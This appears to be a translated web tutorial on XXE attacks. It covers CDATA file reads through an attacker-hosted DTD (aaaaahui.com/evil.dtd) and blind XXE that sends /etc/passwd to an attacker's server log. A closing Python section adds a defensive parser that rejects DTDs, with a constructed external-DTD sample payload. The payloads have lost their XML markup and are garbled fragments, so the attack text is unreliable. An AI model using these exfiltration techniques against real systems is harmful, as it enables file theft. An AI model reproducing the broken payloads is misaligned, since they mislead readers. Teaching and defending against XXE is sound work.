2025-04-05 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
This article explains how XXE (XML External Entity) vulnerabilities work, in some detail; readers who are interested can refer to it, and I hope it is helpful.
Special characters in the file being read
When the file being read contains special characters such as the double quote or the ampersand ("&"), the XML parser tries to interpret them as markup and reports an error, so the read fails. For example, try reading the following file:
C:\test.txt
Content:
Payload:
& ampxxe
Unlike reading system.ini, this produces an error. To understand why, you need to know about CDATA and PCDATA.
PCDATA
PCDATA stands for Parsed Character Data.
An XML parser normally parses all the text in an XML document.
When an XML element is parsed, the text between its tags is parsed as well:
This text will also be parsed
The parser does this because an XML element can contain other elements; in this example, the element contains two other elements (first and last):
BillGates
The parser breaks it down into child elements like this:
BillGates
CDATA
CDATA stands for Unparsed Character Data: text that the XML parser should not parse.
Inside an XML element, such characters are illegal because the parser treats them as markup. A CDATA section cannot contain the string "]]>", and nested CDATA sections are not allowed either.
The "]]>" that ends a CDATA section cannot contain spaces or line breaks.
The idea is to wrap the contents of the file being read in a CDATA section and then reference it, so the first attempt at a PoC looks like this:
]% xxe; > & start
But I still can't read it, as shown in the following screenshot:
Here is the working payload; the explanation follows.
% dtd;] > & ampall
http://aaaaahui.com/evil.dtd
This payload reads the file successfully. Now compare the two payloads.
The logic of both payloads is the same, but the second one places the declarations in an external DTD. The reason is a restriction in the XML parser: a parameter entity cannot be referenced inside an entity declaration in the internal subset. The error "PEReferences forbidden in internal subset in Entity" says exactly that: parameter entity references are forbidden in the internal subset.
Exploiting XXE without echo (blind XXE)
Many XXE vulnerabilities today return no output at all. The following shows how such cases can still be exploited when nothing is echoed.
The idea is that, when there is no echo, the contents of the file are carried out in a request. For example, if the /etc/passwd file is assigned to the entity test, then when http://www.aaaaahui.com/?%test is requested, the access log on our server records the contents of /etc/passwd. Here is an experiment:
% remote;%send;] > 1234
xml.dtd
% start
&#x25; is the character reference for %, used because a literal % cannot appear inside an entity declaration in xml.dtd.
The experiment is shown below.
Viewing the log file
The file read here has been carried out of the target. The principle is to assign the file to an entity, make the target request our VPS, and then find the file's contents in the VPS log.
That is all on understanding XXE vulnerabilities. I hope the above is of some help and that you can learn more from it. If you found the article useful, please share it so more people can see it.
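Every payload on this page needs a DOCTYPE, and the working ones need a parameter entity that pulls in an external DTD, so the matching defensive check is a parser that refuses any DTD and never resolves external references. The following is an added example, not code from the original article, built on Python's standard-library expat bindings; the two sample documents and the placeholder host dtd.example.invalid are constructed for the demonstration.

```python
import xml.parsers.expat as expat

class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DTD, the one thing every XXE payload needs."""

def inspect_xml(data: bytes) -> dict:
    """Parse with expat while resolving nothing, recording what the DTD declares.
    No ExternalEntityRefHandler is set, so SYSTEM entities are never fetched, and
    parameter-entity expansion (the %dtd; / %remote; trick above) is disabled."""
    findings = {"doctype": None, "entities": [], "tags": [], "error": None}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = {"name": name, "system_id": system_id,
                               "internal_subset": bool(has_internal_subset)}

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        findings["entities"].append({"name": name, "parameter": bool(is_param),
                                     "system_id": system_id})

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = lambda tag, attrs: findings["tags"].append(tag)
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings["error"] = str(exc)  # keep what was seen before the parser gave up
    return findings

def parse_untrusted(data: bytes) -> list:
    """Fail closed: any DOCTYPE is rejected before the body is trusted."""
    found = inspect_xml(data)
    if found["doctype"] is not None:
        external = [e["name"] for e in found["entities"] if e["system_id"]]
        raise UnsafeXMLError(f"DOCTYPE present; external entities: {external}")
    if found["error"]:
        raise UnsafeXMLError(found["error"])
    return found["tags"]

# Constructed samples: a benign document, and one shaped like the page's blind
# payload (a parameter entity that pulls in a placeholder external DTD).
BENIGN = b"<name><first>Bill</first><last>Gates</last></name>"
OOB_STYLE = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://dtd.example.invalid/xml.dtd"> %remote; ]>'
             b"<data>1234</data>")
```

inspect_xml is also usable on its own as a detection hook: logging its findings for every inbound request surfaces DOCTYPE and SYSTEM declarations without ever resolving them.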